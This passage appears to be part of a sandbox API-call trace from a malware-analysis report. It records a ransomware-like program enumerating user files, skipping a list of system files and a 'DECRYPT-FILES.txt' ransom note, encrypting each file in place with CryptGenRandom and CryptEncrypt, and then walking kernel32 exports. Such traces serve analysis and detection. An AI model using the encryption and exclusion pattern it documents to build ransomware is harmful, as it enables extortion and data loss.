(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.998] CloseHandle (hObject=0x0) returned 0 [0085.998] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.998] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="autorun.inf") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot.ini") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="desktop.ini") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="iconcache.db") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootsect.bak") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat.log") returned 1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="thumbs.db") returned -1 [0085.998] lstrcmpiW (lpString1="ntuser.ini", lpString2="Bootfont.bin") returned 1 [0085.998] lstrlenW (lpString="ntuser.ini") returned 10 [0085.998] lstrcmpiW (lpString1="ini", lpString2="lnk") returned -1 [0085.998] lstrcmpiW (lpString1="ini", lpString2="exe") returned 1 [0085.998] lstrcmpiW (lpString1="ini", lpString2="sys") returned -1 [0085.999] lstrcmpiW (lpString1="ini", lpString2="dll") returned 1 [0085.999] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.999] lstrlenW (lpString="ntuser.ini") returned 10 [0085.999] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.999] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" [0085.999] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0086.000] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3f2e368 | out: lpFileSize=0x3f2e368*=20) returned 1 [0086.000] CreateFileMappingW (hFile=0x430, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x434 [0086.000] MapViewOfFile (hFileMappingObject=0x434, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.000] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.000] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.000] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.002] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0086.002] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.003] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.003] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.003] CloseHandle (hObject=0x434) returned 1 [0086.003] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.003] WriteFile (in: hFile=0x430, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0086.004] CloseHandle (hObject=0x0) returned 0 [0086.004] CloseHandle (hObject=0x430) returned 1 [0086.004] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.004] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.005] GetTickCount () returned 0x114df48 [0086.005] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.005] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.005] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.005] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.005] lstrlenA (lpString="kernel32.dll") returned 12 [0086.006] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.006] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.006] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.006] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.006] lstrlenA (lpString="ADDATOMA") returned 8 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.006] lstrlenA (lpString="ADDATOMW") returned 8 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.006] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.006] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.006] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.006] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.006] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.006] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.006] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.006] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.006] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.006] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.006] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.006] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.007] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.007] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.007] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.007] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.007] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.007] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.007] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.007] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.007] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.007] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.007] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.007] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.007] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.007] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.007] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.007] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.007] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.007] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.007] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.008] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.008] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.008] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.008] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.008] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.008] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.008] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.008] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.008] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.008] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.008] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.008] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.008] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.008] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.008] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.008] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.008] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.008] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.008] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.009] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.009] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.009] lstrlenA (lpString="BEEP") returned 4 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.009] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.009] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.009] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.009] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.009] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.009] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.009] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.009] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.009] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.009] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.009] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.009] lstrlenA (lpString="CANCELIO") returned 8 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.009] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.009] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.009] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.009] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.009] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.010] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.010] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.010] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.010] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.010] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.010] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.010] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.010] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.010] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.010] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.010] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.010] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.010] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.010] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.010] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.010] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.010] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.010] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.010] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.011] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.011] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.011] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.011] lstrlenA 